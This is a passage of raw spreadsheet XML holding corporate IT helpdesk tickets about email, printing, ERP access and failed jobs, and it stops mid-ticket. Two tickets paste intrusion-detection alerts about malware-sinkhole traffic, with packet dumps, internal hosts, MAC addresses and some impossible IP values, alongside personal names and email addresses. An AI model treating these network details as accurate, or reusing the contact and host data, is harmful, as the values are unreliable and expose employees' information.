i have 2 previous tickets for an issue that i am experiencing again today.  i am not sure why i keep having this issue, can someone help me understand if it is something i am doing wrong?  this is something i use daily and need access to.
inc1547050 â€“ 9/05/16
inc1542047 â€“ 8/18/16
description: when i try to look at a configuration for a rqfhiong zkwfqagb, i get an error - while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'
</t>
  </si>
  <si>
    <t>iauqlrjk nijdaukz</t>
  </si>
  <si>
    <t>product selector not working</t>
  </si>
  <si>
    <t>please investigate the issue with the product selector. currently no data is being loaded on the company website.</t>
  </si>
  <si>
    <t>no display on the external monitor connected through docking station</t>
  </si>
  <si>
    <t xml:space="preserve">no display on the external monitor connected through docking station_x000D_
_x000D_
i request you to kindly look into a video display issue on my computer where i do not get display on the external monitor when docked to the docking station. i have tried on other docking stations and have not been able to get the display on the external monitor. i've had this issue for over three months and it was intermittent earlier. _x000D_
i had discussed this with ghkkytu and he is aware of this issue as we have worked on it together._x000D_
we have reinstalled video drivers but issue still persists. i will leave the computer with security _x000D_
request assistance on the same._x000D_
</t>
  </si>
  <si>
    <t>ticket update on ticket_no0442920</t>
  </si>
  <si>
    <t>unable to print from printer // install driver</t>
  </si>
  <si>
    <t>mscrm: outlook not opening.</t>
  </si>
  <si>
    <t>mscrm: outlook not opening._x000D_
-connected to the user system using teamviewer._x000D_
-reconfigured the user profile ._x000D_
-launched outlook._x000D_
-caller confirmed that he is now able to see the emails on outlook._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t xml:space="preserve">outlook on my pc won't open.  </t>
  </si>
  <si>
    <t>stays on the open screen and won't complete.  been like this for 2 days.  
(in an off-site meeting so may not be able to answer phone for a while)</t>
  </si>
  <si>
    <t>unable to access windows account</t>
  </si>
  <si>
    <t>auf den totmannhandys ist eine stÃ¶rung.</t>
  </si>
  <si>
    <t>auf den totmannhandys ist eine stÃ¶rung._x000D_
" techn. stÃ¶rung dps-request fehlt ! "</t>
  </si>
  <si>
    <t>tfrbwoua aegpkruc</t>
  </si>
  <si>
    <t xml:space="preserve">urgent help required- crm mobile app </t>
  </si>
  <si>
    <t>loading crm mobile app times out and returns to phone desktop before completing download</t>
  </si>
  <si>
    <t>user haveing issues with the skype audio.</t>
  </si>
  <si>
    <t>user haveing issues with the skype audio._x000D_
-connected to the user system using teamviewer._x000D_
-checked the audio settings ._x000D_
-gave a uacyltoe hxgaycze call to the user.all fine._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 09/22/2016 14:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 09/22/2016 14:15:00</t>
  </si>
  <si>
    <t>collaboration_platform permission help</t>
  </si>
  <si>
    <t xml:space="preserve">i made a mistake and change the permissions do basically everything on the following page.  i wanted to see if there was a way to restore all permissions to what they were yesterday?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>user wanted help to check if a email was spam.</t>
  </si>
  <si>
    <t>user wanted help to check if a email was spam._x000D_
-connected to the user system using teamviewer._x000D_
-assigned the ticket to the spam._x000D_
-educated the user on the same._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>skype problem!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ztdgvclp.gzcalstq@gmail.com_x000D_
_x000D_
hello,_x000D_
i am having a problem with skype. i am not able to find my colleagues!!!_x000D_
[cid:image001.png@01SID_354d3.4a1aefe0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ztdgvclp gzcalstq</t>
  </si>
  <si>
    <t>ie cleanup</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access bex analyzer </t>
  </si>
  <si>
    <t xml:space="preserve">unable to access bex analyzer as nothing happens when click 
pc name: lmdl8516210
phone: </t>
  </si>
  <si>
    <t>jfgkmauh wfrgkejq</t>
  </si>
  <si>
    <t>erp login information misplaced</t>
  </si>
  <si>
    <t>puxyqwjn zgmnsvjx</t>
  </si>
  <si>
    <t>ticket update inplant_862994</t>
  </si>
  <si>
    <t xml:space="preserve">outlook asking to reactivate </t>
  </si>
  <si>
    <t>tfrpybxj qodbpvwj</t>
  </si>
  <si>
    <t>unable to print from the printer hp color laser cp4005 pcl6-cl33</t>
  </si>
  <si>
    <t>unable to print from the printer hp color laser cp4005 pcl6-cl33_x000D_
-connected to the user system using teamviewer._x000D_
-the printer keeps asking to update drivers._x000D_
-tried to install the drivers . no go_x000D_
-contact : -8093_x000D_
-computer name : lhql8516312_x000D_
-user wants to have local it look as there are many users faceing similar issue.</t>
  </si>
  <si>
    <t>edanpfzl qyrfndkp</t>
  </si>
  <si>
    <t>usb port issue</t>
  </si>
  <si>
    <t>usb ports not works at time</t>
  </si>
  <si>
    <t>qubywmgf jouickqx</t>
  </si>
  <si>
    <t>ie upgrade</t>
  </si>
  <si>
    <t>upgraded the ie to 11 on uacyltoe hxgaycze workstation.</t>
  </si>
  <si>
    <t>user wants to change the erp printer prt1: prtqv0001 to prt2:prtqz7282</t>
  </si>
  <si>
    <t>:i am trying to find an expense report to approve. i have an email that says i have one to approve. it is not showing up</t>
  </si>
  <si>
    <t>name:bonhyb knepkhsw
language:
browser:microsoft internet explorer
email:xziwkgeo.gdiraveu@gmail.com
customer number:
telephone:
summary:i am trying to find an expense report to approve. i have an email that says i have one to approve. it is not showing up.</t>
  </si>
  <si>
    <t>crm app installation</t>
  </si>
  <si>
    <t>cannot connect to \\HostName_779\engineering_application going through company vpn. i can access HostName_770, HostName_768 and HostName_776.</t>
  </si>
  <si>
    <t>cannot connect to \\HostName_779\engineering_application going through company vpn. i can access HostName_770, HostName_768 and HostName_776 servers through the vpn. i can access HostName_779 at the office. i can not access remotely through vpn.company.com.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to install crm app on galaxy s3 </t>
  </si>
  <si>
    <t xml:space="preserve">user has a samsung galaxy s3 device with android 4.3 as the os on it. he wants to install and use the dynamics crm app but that app requires android 4.4 as a minimum. </t>
  </si>
  <si>
    <t>GRP_63</t>
  </si>
  <si>
    <t>ticket update on inplant_861679</t>
  </si>
  <si>
    <t>erp vc - configair application in SID_1 uacyltoe hxgaycze environment not working - 500 internal server error</t>
  </si>
  <si>
    <t>configair server in uacyltoe hxgaycze environment SID_1 responds with 500 internal server error: Â Â error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist' _x000D_
this happens when i log on erp with language "de" german. it is happening for both models csscdrill and mill_model._x000D_
in case i log on erp in en language the csscdrill model is working fine. but the mill_model model comes up and when i select a product platform the system hangs up at 90%.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_986:  application "plm scheduled tasks monitor" on node "HostName_986" is in a critical state </t>
  </si>
  <si>
    <t>qgzfklpu dqumyvlo</t>
  </si>
  <si>
    <t>EU_tool issue</t>
  </si>
  <si>
    <t xml:space="preserve">EU_tool is having issue since we i upgraded to 64 bit.  keeps saying out of memory
phone: </t>
  </si>
  <si>
    <t>ulmctsvi lbvrdika</t>
  </si>
  <si>
    <t>need to upgrade ie 11</t>
  </si>
  <si>
    <t>could you please confirm if this upgrade occurred?  i was out of town during the week of the upgrade and was never prompted for anything, so i suspect that this didn't happen.  if so, i'll need to schedule an upgrade for this computer please.</t>
  </si>
  <si>
    <t xml:space="preserve">sometimes ship to address is changed from the system </t>
  </si>
  <si>
    <t>examples _x000D_
5616762610_x000D_
4505623480_x000D_
5616737367_x000D_
4505646259_x000D_
problem as discussed in key user call from 09/21</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1394 failed in job_scheduler at: 09/22/2016 10:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1394 failed in job_scheduler at: 09/22/2016 10:55:00</t>
  </si>
  <si>
    <t>engineering_tool issue  high importance</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xkegcqov.drctxjqi@gmail.com_x000D_
_x000D_
[cid:image001.png@01SID_354be.f00aff40]_x000D_
_x000D_
_x000D_
i submitted several reports a couple of days ago and now it will not let me create a new report?_x000D_
need this issue resplved._x000D_
</t>
  </si>
  <si>
    <t>xkegcqov drctxjqi</t>
  </si>
  <si>
    <t>ticket update on inplant_862933</t>
  </si>
  <si>
    <t>need access to user's collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">need access to user's collaboration_platform_x000D_
_x000D_
_x000D_
summary:cowqyjzm fzsxgapt has informed me that stefyty smhdyhtis collaboration_platform for business will be permanently deleted in 7 days.  i need access to his collaboration_platform to see if there is any information on their that we need.  </t>
  </si>
  <si>
    <t>erp pur - wrong subcontracting demand for mm 3784477</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
material 4895588 shows 2 pieces demand in plant_283 for  parent mm 7236071 which refers to subcontracting po 5616525187._x000D_
the po has been closed already. the component had been shipped to the vendor with a 541 movement and has been booked out with the 543 movement together with the 101 movement for the good receipt. _x000D_
why shows erp still a demand of 2 pieces for that po?_x000D_
how can this "wrong" demand been cleaned?_x000D_
</t>
  </si>
  <si>
    <t>cannot access collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">i can't access my collaboration_platform.  it asks me my username and password and then goes into a constant loop of those two fields.  once entered, i never actually get to collaboration_platform.  </t>
  </si>
  <si>
    <t>vitalyst // unable to see customer list in crm</t>
  </si>
  <si>
    <t xml:space="preserve">vitalyst // unable to see customer list in crm. see attached screenshot
user id - lehhywsmat
contact no - </t>
  </si>
  <si>
    <t xml:space="preserve">ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
rbozivdq gmlhrtvp
 hi jonnht
bnoupaki cpeioxdz
 hello
rbozivdq gmlhrtvp
 it's not showing as locked
 can you tell me what's the error you're getting?
bnoupaki cpeioxdz
 now i can log in.  not sure why i was temporarily unable to do so.  all seems to be ok.   </t>
  </si>
  <si>
    <t>erp netweaver error</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: unrbafjx.reyshakw@gmail.com
hello,
i have this error when starting erp netweaver, can you please help to solve ?
[cid:image001.png@01SID_354ed.42570791]
[cid:image002.png@01SID_354ed.42570791]
unrbafjx reyshakw
global portfolio manager
advanced materials / pcd
</t>
  </si>
  <si>
    <t>password reset - erp SID_34</t>
  </si>
  <si>
    <t>reset the erp SID_34 password as marcel had issues logging in after resetting his password using password_management_tool.</t>
  </si>
  <si>
    <t>yszectoh kqwljchg</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to home printer </t>
  </si>
  <si>
    <t>ztrpuvdf jlahkmdv</t>
  </si>
  <si>
    <t>PR</t>
  </si>
  <si>
    <t xml:space="preserve">create a purchase requisition with purchasing does not work any more. i got following error massage :_x000D_
_x000D_
action could not be performed _x000D_
no data found for employee 00000etc inform system administrator </t>
  </si>
  <si>
    <t>security incidents - ( #in33944691 ) : possible malware infection - traffic from sinkhole domain to tims-iphone</t>
  </si>
  <si>
    <t>source ip: 195.272.28.222
source port: 80
source ip geolocation: lisbon, prt
destination ip: 10.201.40.86
destination hostname: tims-iphone
system name :not found
user  name:not found
location :usa
sep , sms status :not found
field sales user ( yes / no) :  no
dsw event log:see below
=========================
event data
=========================
related events: 
event id: 416678855
event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset
occurrence count: 4
event count: 2
host and connection information
source ip: 195.272.28.222
source port: 80
source ip geolocation: lisbon, prt
destination ip: 10.201.40.86
destination hostname: tims-iphone
destination port: 50867
destination mac address: 4c:7c:5f:36:97:8d
connection directionality: incoming
protocol: tcp
http status code: 302
device information
device ip: 10.32.100.17
device name: isensor03.company.com
log time: 2016-09-22 at 10:40:17 utc
action: not blocked
vendor eventid: 727755
cvss score: -1 
vendor priority: 2
vendor version: 7
scwx event processing information
sherlock rule id (sle): 699417
inspector event id: 072629004
ontology id: 200020003203755736
event type id: 200020003203582148
agent id: 102805
event detail:
[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]
[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]
[sensor id: 602982][event id: 727755][time: 2585651928.978762]
[src ip: 195.22.28.222][dst ip: 10.20.40.86][sport/itype: 80][dport/icode: 50867][proto: 6]
09/22/2016-10:40:17.978762 195.22.28.222:80 -&gt; 10.20.40.86:50867
tcp ttl:55 tos:0x0 id:35970 iplen:20 dgmlen:390 df
***ap*** seq: 0x67a1bbf6 ack: 0x8043a3dc win: 0x35 tcplen: 32
tcp options (3) =&gt; nop nop ts: 4914239511 340005971 
==pcap 1==
[o:security]
[correlation_data]
sep 22 06:32:17 27.38.93.278 dhcpd[27069]: dhcpack on 10.20.40.86 to 4c:7c:5f:36:97:8d (tims-iphone) via eth1 relay 62.61.65.018 lease-duration 432000 (renew)
ascii packet(s):
==pcap 1 ascii s==
.......wj...........e.....@.7.........(v.p..g....c.....5au........"p.n..http/1.1.302.moved.temporarily..server:.nginx..date:.thu,.22.sep.2016.10:40:18.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=c3613dd3017c909140052247b5cfac27;.domain=.myslidz.com..location:.
==pcap 1 ascii e==
hex packet(s):
==pcap 1 hex s==
000000 0c00 0000 11b5 e357 4aef 0e00 8601 0000 .......wj.......
000010 8601 0000 4500 0186 8c82 4000 3706 a391 ....e.....@.7...
000020 c316 1cde 0a14 2856 0050 c6b3 67a1 bbf6 ......(v.p..g...
000030 8043 a3dc 8018 0035 6155 0000 0101 080a .c.....5au......
000040 e2af 2250 0e4e 07ec 4854 5450 2f31 2e31 .."p.n..http/1.1
000050 2033 3032 204d 6f76 6564 2054 656d 706f .302.moved.tempo
000060 7261 7269 6c79 0d0a 5365 7276 6572 3a20 rarily..server:.
000070 6e67 696e 780d 0a44 6174 653a 2054 6875 nginx..date:.thu
000080 2c20 3232 2053 6570 2032 3031 3620 3130 ,.22.sep.2016.10
000090 3a34 303a 3138 2047 4d54 0d0a 436f 6e74 :40:18.gmt..cont
0000a0 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-type:.text/h
0000b0 746d 6c0d 0a43 6f6e 6e65 6374 696f 6e3a tml..connection:
0000c0 2063 6c6f 7365 0d0a 5365 742d 436f 6f6b .close..set-cook
0000d0 6965 3a20 616e 6274 723d 6333 3631 3364 ie:.anbtr=c3613d
0000e0 6433 3031 3763 3738 3739 3238 3833 3031 d3017c9091400522
0000f0 3437 6235 6366 6163 3237 3b20 646f 6SID_26 47b5cfac27;.doma
000100 696e 3d2e 6d79 736c 6964 7a2e 636f 6d0d in=.myslidz.com.
000110 0a4c 6f63 6174 696f 6e3a 2068 7474 703a .location:.http:
000120 2f2f 7873 736f 2e61 7069 2e6d 7973 6c69 //xsso.api.mysli
000130 647a 2e63 6f6d 2f63 3336 3133 6464 3330 dz.com/c3613dd30
000140 3137 6337 3837 3932 3838 3330 3134 3762 17c909140052247b
000150 3563 6661 6332 370d 0a0d 0a47 6f20 6874 5cfac27....go.ht
000160 7470 3a2f 2f78 7373 6f2e 6170 692e 6d79 tp://xsso.api.my
000170 736c 6964 7a2e 636f 6d2f 6333 3631 3364 slidz.com/c3613d
000180 6433 3031 3763 3738 3739 3238 3833 3031 d3017c9091400522
000190 3437 6235 6366 6163 3237 47b5cfac27
==pcap 1 hex e==
event id: 416678840
event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset
occurrence count: 4
event count: 2
host and connection information
source ip: 195.22.26.248
source hostname: 248.192/26.26.22.195.in-addr.arpa.
anubisnetworks.com.
source port: 80
source ip geolocation: lisbon, prt
destination ip: 10.20.40.86
destination hostname: tims-iphone
destination port: 50867
destination mac address: 4c:7c:5f:36:97:8d
connection directionality: incoming
protocol: tcp
http status code: 302
device information
device ip: 10.32.100.17
device name: isensor03.company.com
log time: 2016-09-22 at 10:40:17 utc
action: not blocked
vendor eventid: 727755
cvss score: -1 
vendor priority: 2
vendor version: 7
scwx event processing information
sherlock rule id (sle): 699417
inspector event id: 072629004
ontology id: 200020003203755736
event type id: 200020003203582148
agent id: 102805
event detail:
[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]
[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]
[sensor id: 602982][event id: 597040][time: 2585651929.453577]
[src ip: 195.22.26.248][dst ip: 10.20.40.86][sport/itype: 80][dport/icode: 50873][proto: 6]
09/22/2016-10:40:18.453577 195.22.26.248:80 -&gt; 10.20.40.86:50873
tcp ttl:55 tos:0x0 id:48955 iplen:20 dgmlen:284 df
***ap*** seq: 0x4abba086 ack: 0xf5079dce win: 0x35 tcplen: 32
tcp options (3) =&gt; nop nop ts: 4914239629 340006418 
==pcap 1==
[o:security]
[correlation_data]
sep 22 06:32:17 27.38.93.278 dhcpd[27069]: dhcpack on 10.20.40.86 to 4c:7c:5f:36:97:8d (tims-iphone) via eth1 relay 62.61.65.018 lease-duration 432000 (renew)
ascii packet(s):
==pcap 1 ascii s==
.......w............e....;@.7.s(......(v.p..j..........5r........."..n..http/1.1.200.ok..server:.nginx..date:.thu,.22.sep.2016.10:40:18.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=c3613dd3017c909140052247b5cfac27;.domain=.myslidz.com..content-encoding:.gzip........................
==pcap 1 ascii e==
hex packet(s):
==pcap 1 hex s==
000000 0c00 0000 12b5 e357 c9eb 0600 1c01 0000 .......w........
000010 1c01 0000 4500 011c bf3b 4000 3706 7328 ....e....;@.7.s(
000020 c316 1af8 0a14 2856 0050 c6b9 4abb a086 ......(v.p..j...
000030 f507 9dce 8018 0035 729f 0000 0101 080a .......5r.......
000040 e2af 22c6 0e4e 09ab 4854 5450 2f31 2e31 .."..n..http/1.1
000050 2032 3030 204f 4b0d 0a53 6572 7665 723a .200.ok..server:
000060 206e 6769 6e78 0d0a 4461 7465 3a20 5468 .nginx..date:.th
000070 752c 2032 3220 5365 7020 3230 3136 2031 u,.22.sep.2016.1
000080 303a 3430 3a31 3820 474d 540d 0a43 6f6e 0:40:18.gmt..con
000090 7465 6e74 2d54 7970 653a 2074 6578 742f tent-type:.text/
0000a0 6874 6d6c 0d0a 436f 6e6e 6563 7469 6f6e html..connection
0000b0 3a20 636c 6f73 650d 0a53 6574 2d43 6f6f :.close..set-coo
0000c0 6b69 653a 2061 6e62 7472 3d63 3336 3133 kie:.anbtr=c3613
0000d0 6464 3330 3137 6337 3837 3932 3838 3330 dd3017c898039941
0000e0 3134 3762 3563 6661 6332 373b 2064 6f6d 147b5cfac27;.dom
0000f0 6169 6e3d 2e6d 7973 6c69 647a 2e63 6f6d ain=.myslidz.com
000100 0d0a 436f 6e74 656e 742d 456e 636f 6469 ..content-encodi
000110 6e67 3a20 677a 6970 0d0a 0d0a 1f8b 0800 ng:.gzip........
000120 0000 0000 0003 0300 0000 0000 0000 0000 ................
==pcap 1 hex e==</t>
  </si>
  <si>
    <t xml:space="preserve"> ship-to # 81051078 + 81053823 created in distributor_tool / not visible in ecc</t>
  </si>
  <si>
    <t xml:space="preserve">i have created a new ship-to # 81053823 for the sold-to # 81543703 via distributor_tool._x000D_
this ship-to can't be found either in ecc nor in distributor_tool. _x000D_
you can only see that it actually exists in crm. _x000D_
same situation as with ship-to # 81051078._x000D_
_x000D_
all the data are complete in crm and the system does not show any errors.  but for some reason, these ship-to's are not transferred into ecc._x000D_
could you please look at that?_x000D_
</t>
  </si>
  <si>
    <t>security incidents - ( #in33944327) :possible malware infection - traffic from sinkhole domain to ekxl7000016</t>
  </si>
  <si>
    <t>source ip :_x000D_
system name :_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 5286271_x000D_
event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000D_
occurrence count: 3_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 195.22.26.248_x000D_
source hostname: 248.192/26.26.22.195.in-addr.arpa._x000D_
anubisnetworks.com._x000D_
source port: 80_x000D_
source ip geolocation: lisbon, prt_x000D_
destination ip: 08.79.36.8523_x000D_
destination hostname: ekxl8111127 _x000D_
destination port: 50049_x000D_
destination mac address: 3c:a9:f4:22:ba:ec_x000D_
connection directionality: incoming_x000D_
protocol: tcp_x000D_
http status code: 200_x000D_
_x000D_
device information_x000D_
device ip: 10.16.4.16_x000D_
device name: isensor04.company.com_x000D_
log time: 2016-09-22 at 09:35:51 utc_x000D_
action: not blocked_x000D_
vendor eventid: 590716_x000D_
cvss score: -1 _x000D_
vendor priority: 2_x000D_
vendor version: 7_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 699417_x000D_
inspector event id: 638402921_x000D_
ontology id: 200020003203755736_x000D_
event type id: 200020003203582148_x000D_
agent id: 102823_x000D_
_x000D_
event detail:_x000D_
[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000D_
[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 602983][event id: 590716][time: 2585647062.510177]_x000D_
[src ip: 195.22.26.248][dst ip: 08.79.36.8523][sport/itype: 80][dport/icode: 50049][proto: 6]_x000D_
09/22/2016-09:35:51.510177 195.22.26.248:80 -&gt; 08.79.36.8523:50049_x000D_
tcp ttl:55 tos:0x0 id:21540 iplen:20 dgmlen:279 df_x000D_
***ap**f seq: 0xf7ae9448 ack: 0x5dd9d0de win: 0x68b0 tcplen: 20_x000D_
==pcap 1==_x000D_
_x000D_
[o:security]_x000D_
_x000D_
[correlation_data]_x000D_
sep 22 04:02:00 60.43.89.120 dhcpd[23598]: dhcpack on 08.79.36.8523 to 3c:a9:f4:22:ba:ec (ekxl8111127) via eth2 relay 97.65.25.820 lease-duration 604729 (renew)_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
.......w............e...t$@.7............p.....h]...p.h.....http/1.1.200.ok..server:.nginx..date:.thu,.22.sep.2016.09:35:51.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=f34d5b1ccc2b299beffaf2b6227b7a09;.domain=.space-ambiance.com..content-encoding:.gzip........................_x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000 0c00 0000 f7a5 e357 e1c8 0700 1701 0000 .......w........_x000D_
000010 1701 0000 4500 0117 5424 4000 3706 f5ab ....e...t$@.7..._x000D_
000020 c316 1af8 0a10 10f3 0050 c381 f7ae 9448 .........p.....h_x000D_
000030 5dd9 d0de 5019 68b0 171f 0000 4854 5450 ]...p.h.....http_x000D_
000040 2f31 2e31 2032 3030 204f 4b0d 0a53 6572 /1.1.200.ok..ser_x000D_
000050 7665 723a 206e 6769 6e78 0d0a 4461 7465 ver:.nginx..date_x000D_
000060 3a20 5468 752c 2032 3220 5365 7020 3230 :.thu,.22.sep.20_x000D_
000070 3136 2030 393a 3335 3a35 3120 474d 540d 16.09:35:51.gmt._x000D_
000080 0a43 6f6e 7465 6e74 2d54 7970 653a 2074 .content-type:.t_x000D_
000090 6578 742f 6874 6d6c 0d0a 436f 6e6e 6563 ext/html..connec_x000D_
0000a0 7469 6f6e 3a20 636c 6f73 650d 0a53 6574 tion:.close..set_x000D_
0000b0 2d43 6f6f 6b69 653a 2061 6e62 7472 3d66 -cookie:.anbtr=f_x000D_
0000c0 3334 6435 6231 6363 6332 6232 3939 6265 34d5b1ccc2b299be_x000D_
0000d0 6666 6166 3262 3632 3237 6237 6130 393b ffaf2b6227b7a09;_x000D_
0000e0 2064 6f6d 6169 6e3d 2e73 7061 6365 2SID_26 .domain=.space-a_x000D_
0000f0 6d62 6961 6e63 652e 636f 6d0d 0a43 6f6e mbiance.com..con_x000D_
000100 7465 6e74 2d45 6e63 6f64 696e 673a 2067 tent-encoding:.g_x000D_
000110 7a69 700d 0a0d 0a1f 8b08 0000 0000 0000 zip............._x000D_
000120 0303 0000 0000 0000 0000 00 ..........._x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number? 1135889479/000020_x000D_
5018083720/00001_x000D_
_x000D_
what material or item number? 7133965_x000D_
_x000D_
what warehouse location? _x000D_
plant_108 to plant_283_x000D_
_x000D_
issue description / error message? no message</t>
  </si>
  <si>
    <t>9047883335 - sales inwarehouse_tool rejected as the banking details are not printed</t>
  </si>
  <si>
    <t>the footer with banking details has not printed on inwarehouse_tool 0158994446, the customer has rejected this inwarehouse_tool until the footer details are corrected.</t>
  </si>
  <si>
    <t>lmwfdnri joplxizv</t>
  </si>
  <si>
    <t>unable to detect the dell  usb adapter</t>
  </si>
  <si>
    <t xml:space="preserve">unable to detect the dell  usb adapter_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>india high latency</t>
  </si>
  <si>
    <t>analysis add-in getting disabled</t>
  </si>
  <si>
    <t>lcowx216132</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zwirhcol.narzlmfw@gmail.com
computer has lost connectivity to the network
j. shrugott tyhuellis
usa facilities mgr.
zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;
</t>
  </si>
  <si>
    <t>lcow7404551</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zwirhcol.narzlmfw@gmail.com
computer has partial connectivity to network.  cannot get to all drives needed
j. shrugott tyhuellis
usa facilities mgr.
zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;
</t>
  </si>
  <si>
    <t>clad qc computer is moving to a new location</t>
  </si>
  <si>
    <t>this computer is moving to a new location, the new setup needs to be completed so production is not interrupted._x000D_
note:  shrugott tyhuellis may or may not have entered a ticket for this move.</t>
  </si>
  <si>
    <t>uqrbzknc snvimeqt</t>
  </si>
  <si>
    <t xml:space="preserve">clad qc computer cannot access the erp, shop_floor_app and shared files to do his work,  </t>
  </si>
  <si>
    <t>brgtyad ahdwqrson is the operator in this area, his work is at a standstill which also affects subsequent operations - nearing end of month the product needs to move and computer work needs to be complete</t>
  </si>
  <si>
    <t>gthxezqp ainuhbmk desk is moving, cables need run to new location and service needs to be restored in new location</t>
  </si>
  <si>
    <t>in the next week the operators control desk is moving to make room for other equipment.  this computer setup has 7-computers, 6 of which are connected to the furnace operations for monitoring by operators in the area.  the table needs to physically move and the cables need to be re-activated in the new location.  the other computer in this area is connected to shop_floor_app and shared files for the operators to access their work files - all of this must work in the new location.</t>
  </si>
  <si>
    <t>the computer in my office needs access to the o-drive for "rolling data"</t>
  </si>
  <si>
    <t>this is a location for the access database for our rolling information, currently i need to interrupt their data entry to extract information for a project - also the database stopped calculating the density number, can you fix this?  my limited experience with access doesn't help me fix this problem.
looks like the path is \\lan-d2 rolling
-contact :</t>
  </si>
  <si>
    <t xml:space="preserve">auflÃ¶sung am bildschirm von pc eemw 8143337 sehr schlecht. Ã¤nderungen werden nicht Ã¼bernommen. </t>
  </si>
  <si>
    <t>engineering_tool log in problem</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: amrthruta.kadgdyam@company.com
hello team,
please check the below error i am getting during logging in for engineering_tool. i have changed my laptop. its details are as follows:
computer name
service tag
model name
aiul8912144
dvzlq12
latitude e5440
username: kadjuwqama
earlier i was using engineering_tool with the below laptop and username:
username: kadjuwqama
laptop name: awyl8911781
errors during engineering_tool login are as mentioned below.
same error i get during company engineering_tool log in. please do the needful.
[description: cid:image001.png@01SID_354e5.4e972400]
</t>
  </si>
  <si>
    <t>reset the password for rlhuwmve krcfhoxj on erp / qa / erp</t>
  </si>
  <si>
    <t>please reset petrghada's SID_1 password as soon as possible.</t>
  </si>
  <si>
    <t>rlhuwmve krcfhoxj</t>
  </si>
  <si>
    <t>laptop will not start up while docked, blue power light on the lights up briefly then goes off.</t>
  </si>
  <si>
    <t>zlemowkf hamtklux</t>
  </si>
  <si>
    <t>business_client error during log in</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: amrthruta.kadgdyam@company.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
please check the below error i am getting during logging in business_client._x000D_
_x000D_
[cid:image001.jpg@01SID_354fa.b03a3570]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bluetooth headset bekommt keine verbindung mit pc - assign to qdxyifhj zbwtunpy  germany</t>
  </si>
  <si>
    <t>bluetooth headset bekommt keine verbindung mit pc</t>
  </si>
  <si>
    <t>bwgldaoe aczyfqjr</t>
  </si>
  <si>
    <t xml:space="preserve">please complete all required questions below.  _x000D_
if not, it will be returned back to the gsc / requester to provide required information_x000D_
_x000D_
_x000D_
   â€¢  printer name / make - model?  (wy-27) _x000D_
 _x000D_
   â€¢  detailed description of the problem ? wy-27 printer to be added to my pc_x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
   </t>
  </si>
  <si>
    <t>need reset  password erp SID_1 system</t>
  </si>
  <si>
    <t>gzawrocy shbgwxep</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1132 failed in job_scheduler at: 09/22/2016 08:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1132 failed in job_scheduler at: 09/22/2016 08:00:00</t>
  </si>
  <si>
    <t>to add a new employee to distribution lists</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bmudkpie.qolrvbip@gmail.com
hello,
